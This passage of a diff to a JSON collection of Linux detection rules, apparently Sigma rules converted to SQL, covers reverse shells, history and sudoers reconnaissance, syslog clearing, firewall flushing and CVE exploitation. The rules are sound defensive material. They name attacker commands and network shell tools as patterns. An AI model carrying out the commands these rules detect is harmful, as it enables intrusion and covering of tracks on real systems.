'%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%chown root%' ESCAPE '\\' AND (CommandLine LIKE '% chmod u+s%' ESCAPE '\\' OR CommandLine LIKE '% chmod g+s%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_git_clone.yml" + "filename": "proc_creation_lnx_setgid_setuid.yml" }, { - "title": "Remove Immutable File Attribute", - "id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", - "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Print History File Contents", + "id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.reconnaissance", + "attack.t1592.004" ], "falsepositives": [ - "Administrator interacting with immutable files (e.g. for instance backups)." + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/chattr' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_chattr_immutable_removal.yml" + "filename": "proc_creation_lnx_susp_history_recon.yml" }, { - "title": "Mount Execution With Hidepid Parameter", - "id": "ec52985a-d024-41e3-8ff6-14169039a0b3", - "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", + "title": "Touch Suspicious Service File", + "id": "31545105-3444-4584-bebf-c466353230d2", + "description": "Detects usage of the \"touch\" process in service file.", "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.credential_access", - "attack.t1564" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "Admin changing date of files." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/mount' ESCAPE '\\' AND CommandLine LIKE '%hidepid=2%' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/touch' ESCAPE '\\' AND CommandLine LIKE '% -t %' ESCAPE '\\' AND CommandLine LIKE '%.service' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_mount_hidepid.yml" + "filename": "proc_creation_lnx_touch_susp.yml" }, { - "title": "Linux Doas Tool Execution", - "id": "067d8238-7127-451c-a9ec-fa78045b618b", - "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", - "author": "Sittikorn S, Teoderick Contreras", + "title": "BPFtrace Unsafe Option Usage", + "id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "description": "Detects the usage of the unsafe bpftrace option", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the unsafe option" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/doas' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%bpftrace' ESCAPE '\\' AND CommandLine LIKE '%--unsafe%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_doas_execution.yml" + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml" }, { - "title": "Enable BPF Kprobes Tracing", - "id": "7692f583-bd30-4008-8615-75dab3f08a99", - "description": "Detects common command used to enable bpf kprobes tracing", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Linux Recon Indicators", + "id": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%echo 1 >%' ESCAPE '\\' AND CommandLine LIKE '%/sys/kernel/debug/tracing/events/kprobes/%' ESCAPE '\\' AND (CommandLine LIKE '%/myprobe/enable%' ESCAPE '\\' OR CommandLine LIKE '%/myretprobe/enable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '% -name .htpasswd%' ESCAPE '\\' OR CommandLine LIKE '% -perm -4000 %' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml" + "filename": "proc_creation_lnx_susp_recon_indicators.yml" }, { - "title": "Linux Webshell Indicators", - "id": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "description": "Detects suspicious sub processes of web server processes", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ruby Reverse Shell", + "id": "b8bdac18-c06e-4016-ac30-221553e74f59", + "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell", + "author": "@d4ns4n_", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Web applications that invoke Linux command line tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ParentImage LIKE '%/httpd' ESCAPE '\\' OR ParentImage LIKE '%/lighttpd' ESCAPE '\\' OR ParentImage LIKE '%/nginx' ESCAPE '\\' OR ParentImage LIKE '%/apache2' ESCAPE '\\' OR ParentImage LIKE '%/node' ESCAPE '\\' OR ParentImage LIKE '%/caddy' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%tomcat%' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%websphere%' ESCAPE '\\')) AND (Image LIKE '%/whoami' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/bin/uname' ESCAPE '\\' OR Image LIKE '%/bin/cat' ESCAPE '\\' OR Image LIKE '%/bin/crontab' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/pwd' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%ruby%' ESCAPE '\\' AND CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '%rsocket%' ESCAPE '\\' AND CommandLine LIKE '%TCPSocket%' ESCAPE '\\' AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_webshell_detection.yml" + "filename": "proc_creation_lnx_ruby_reverse_shell.yml" }, { - "title": "Terminate Linux Process Via Kill", - "id": "64c41342-6b27-523b-5d3f-c265f3efcdb3", - "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", - "author": "Tuan Le (NCSGroup)", + "title": "Linux Package Uninstall", + "id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", + "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", + "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1070" ], "falsepositives": [ - "Likely" + "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/kill' ESCAPE '\\' OR Image LIKE '%/pkill' ESCAPE '\\' OR Image LIKE '%/killall' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%erase%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\')) OR ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND (CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%purge%' ESCAPE '\\')) OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--remove %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_kill_process.yml" + "filename": "proc_creation_lnx_remove_package.yml" }, { - "title": "Touch Suspicious Service File", - "id": "31545105-3444-4584-bebf-c466353230d2", - "description": "Detects usage of the \"touch\" process in service file.", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "System Information Discovery", + "id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "description": "Detects system information discovery commands", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Admin changing date of files." + "Legitimate administration activities" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/touch' ESCAPE '\\' AND CommandLine LIKE '% -t %' ESCAPE '\\' AND CommandLine LIKE '%.service' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/uname' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/uptime' ESCAPE '\\' OR Image LIKE '%/lspci' ESCAPE '\\' OR Image LIKE '%/dmidecode' ESCAPE '\\' OR Image LIKE '%/lscpu' ESCAPE '\\' OR Image LIKE '%/lsmod' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_touch_susp.yml" + "filename": "proc_creation_lnx_system_info_discovery.yml" }, { - "title": "Cat Sudoers", - "id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", - "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "title": "Linux Shell Pipe to Shell", + "id": "880973f3-9708-491c-a77b-2a35a1921158", + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1592.004" + "attack.defense_evasion", + "attack.t1140" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate software that uses these patterns" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '% /etc/sudoers%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((CommandLine LIKE 'sh -c %' ESCAPE '\\' OR CommandLine LIKE 'bash -c %' ESCAPE '\\') AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_cat_sudoers.yml" + "filename": "proc_creation_lnx_susp_pipe_shell.yml" }, { - "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand", - "id": "21541900-27a9-4454-9c4c-3f0a4240344a", - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Process Discovery", + "id": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + "Legitimate administration activities" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/bin/sh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/ps' ESCAPE '\\' OR Image LIKE '%/top' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + "filename": "proc_creation_lnx_process_discovery.yml" }, { - "title": "Atlassian Confluence CVE-2022-26134", - "id": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "title": "Suspicious Java Children Processes", + "id": "d292e0af-9a18-420c-9525-ec0ac3936892", + "description": "Detects java process spawning suspicious children", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.execution", - "attack.t1190", - "attack.t1059", - "cve.2022.26134" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '/opt/atlassian/confluence/%' ESCAPE '\\' AND ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + "filename": "proc_creation_lnx_susp_java_children.yml" }, { - "title": "Linux Remote System Discovery", - "id": "11063ec2-de63-4153-935e-b1a8b9e616f1", - "description": "Detects the enumeration of other remote systems.", - "author": "Alejandro Ortuno, oscd.community", + "title": "Terminate Linux Process Via Kill", + "id": "64c41342-6b27-523b-5d3f-c265f3efcdb3", + "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", + "author": "Tuan Le (NCSGroup)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activities" + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/arp' ESCAPE '\\' AND CommandLine LIKE '%-a%' ESCAPE '\\') OR (Image LIKE '%/ping' ESCAPE '\\' AND (CommandLine LIKE '% 10.%' ESCAPE '\\' OR CommandLine LIKE '% 192.168.%' ESCAPE '\\' OR CommandLine LIKE '% 172.16.%' ESCAPE '\\' OR CommandLine LIKE '% 172.17.%' ESCAPE '\\' OR CommandLine LIKE '% 172.18.%' ESCAPE '\\' OR CommandLine LIKE '% 172.19.%' ESCAPE '\\' OR CommandLine LIKE '% 172.20.%' ESCAPE '\\' OR CommandLine LIKE '% 172.21.%' ESCAPE '\\' OR CommandLine LIKE '% 172.22.%' ESCAPE '\\' OR CommandLine LIKE '% 172.23.%' ESCAPE '\\' OR CommandLine LIKE '% 172.24.%' ESCAPE '\\' OR CommandLine LIKE '% 172.25.%' ESCAPE '\\' OR CommandLine LIKE '% 172.26.%' ESCAPE '\\' OR CommandLine LIKE '% 172.27.%' ESCAPE '\\' OR CommandLine LIKE '% 172.28.%' ESCAPE '\\' OR CommandLine LIKE '% 172.29.%' ESCAPE '\\' OR CommandLine LIKE '% 172.30.%' ESCAPE '\\' OR CommandLine LIKE '% 172.31.%' ESCAPE '\\' OR CommandLine LIKE '% 127.%' ESCAPE '\\' OR CommandLine LIKE '% 169.254.%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/kill' ESCAPE '\\' OR Image LIKE '%/pkill' ESCAPE '\\' OR Image LIKE '%/killall' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_remote_system_discovery.yml" + "filename": "proc_creation_lnx_kill_process.yml" }, { - "title": "Commands to Clear or Remove the Syslog", - "id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", - "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", - "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Apache Spark Shell Command Injection - ProcessCreation", + "id": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.002" + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" ], "falsepositives": [ - "Log rotation." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%rm /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%mv /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% >/var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% > /var/log/syslog%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ParentImage LIKE '%\\\\bash' ESCAPE '\\' AND (CommandLine LIKE '%id -Gn `%' ESCAPE '\\' OR CommandLine LIKE '%id -Gn ''%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_clear_syslog.yml" + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" }, { - "title": "OMIGOD SCX RunAsProvider ExecuteScript", - "id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", - "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Disable Or Stop Services", + "id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of SCX RunAsProvider ExecuteScript." + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/etc/opt/microsoft/scx/conf/tmpdir/scx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' OR Image LIKE '%/systemctl' ESCAPE '\\' OR Image LIKE '%/chkconfig' ESCAPE '\\') AND (CommandLine LIKE '%stop%' ESCAPE '\\' OR CommandLine LIKE '%disable%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + "filename": "proc_creation_lnx_services_stop_and_disable.yml" }, { - "title": "Suspicious Package Installed - Linux", - "id": "700fb7e8-2981-401c-8430-be58e189e741", - "description": "Detects installation of suspicious packages using system installation utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Interactive Bash Suspicious Children", + "id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate software that uses these patterns" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (ParentCommandLine = 'bash -i' AND ((CommandLine LIKE '%-c import %' ESCAPE '\\' OR CommandLine LIKE '%base64%' ESCAPE '\\' OR CommandLine LIKE '%pty.spawn%' ESCAPE '\\') OR (Image LIKE '%whoami' ESCAPE '\\' OR Image LIKE '%iptables' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\' OR Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\')))" + ], + "filename": "proc_creation_lnx_susp_interactive_bash.yml" + }, + { + "title": "Python Spawning Pretty TTY", + "id": "c4042d54-110d-45dd-a0e1-05c47822c937", + "description": "Detects python spawning a pretty tty which could be indicative of potential reverse shell activity", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%install%' ESCAPE '\\') OR (Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%localinstall%' ESCAPE '\\' OR CommandLine LIKE '%install%' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--install%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\'))) AND (CommandLine LIKE '%nmap%' ESCAPE '\\' OR CommandLine LIKE '% nc%' ESCAPE '\\' OR CommandLine LIKE '%netcat%' ESCAPE '\\' OR CommandLine LIKE '%wireshark%' ESCAPE '\\' OR CommandLine LIKE '%tshark%' ESCAPE '\\' OR CommandLine LIKE '%openconnect%' ESCAPE '\\' OR CommandLine LIKE '%proxychains%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_install_suspicioua_packages.yml" + "filename": "proc_creation_lnx_python_pty_spawn.yml" }, { - "title": "Copy Passwd Or Shadow From TMP Path", - "id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", - "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", + "title": "Flush Iptables Ufw Chain", + "id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", + "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Network administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/cp' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\' AND (CommandLine LIKE '%passwd%' ESCAPE '\\' OR CommandLine LIKE '%shadow%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/xtables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/iptables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/ip6tables' ESCAPE '\\' OR Image LIKE '%/ip6tables-legacy-multi' ESCAPE '\\') AND (CommandLine LIKE '%-F%' ESCAPE '\\' OR CommandLine LIKE '%-Z%' ESCAPE '\\' OR CommandLine LIKE '%-X%' ESCAPE '\\') AND (CommandLine LIKE '%ufw-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw-logging-allow%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-allow%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" + "filename": "proc_creation_lnx_iptables_flush_ufw.yml" }, { - "title": "File and Directory Discovery - Linux", - "id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", - "description": "Detects usage of system utilities to discover files and directories", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Bash Interactive Shell", + "id": "6104e693-a7d6-4891-86cb-49a258523559", + "description": "Detects execution of the bash shell with the interactive flag \"-i\".", + "author": "@d4ns4n_", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.execution" ], "falsepositives": [ - "Legitimate activities" + "Unknown" ], - "level": "informational", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/file' ESCAPE '\\' AND CommandLine REGEXP '(.){200,}') OR (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '%-R%' ESCAPE '\\') OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/tree' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/bash' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_file_and_directory_discovery.yml" + "filename": "proc_creation_lnx_bash_interactive_shell.yml" }, { - "title": "Interactive Bash Suspicious Children", - "id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", - "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", - "author": "Florian Roth (Nextron Systems)", + "title": "Install Root Certificate", + "id": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "author": "Ömer Günal, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], "falsepositives": [ - "Legitimate software that uses these patterns" + "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ParentCommandLine = 'bash -i' AND ((CommandLine LIKE '%-c import %' ESCAPE '\\' OR CommandLine LIKE '%base64%' ESCAPE '\\' OR CommandLine LIKE '%pty.spawn%' ESCAPE '\\') OR (Image LIKE '%whoami' ESCAPE '\\' OR Image LIKE '%iptables' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\' OR Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/update-ca-certificates' ESCAPE '\\' OR Image LIKE '%/update-ca-trust' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_susp_interactive_bash.yml" + "filename": "proc_creation_lnx_install_root_certificate.yml" }, { - "title": "Apache Spark Shell Command Injection - ProcessCreation", - "id": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local Groups Discovery - Linux", + "id": 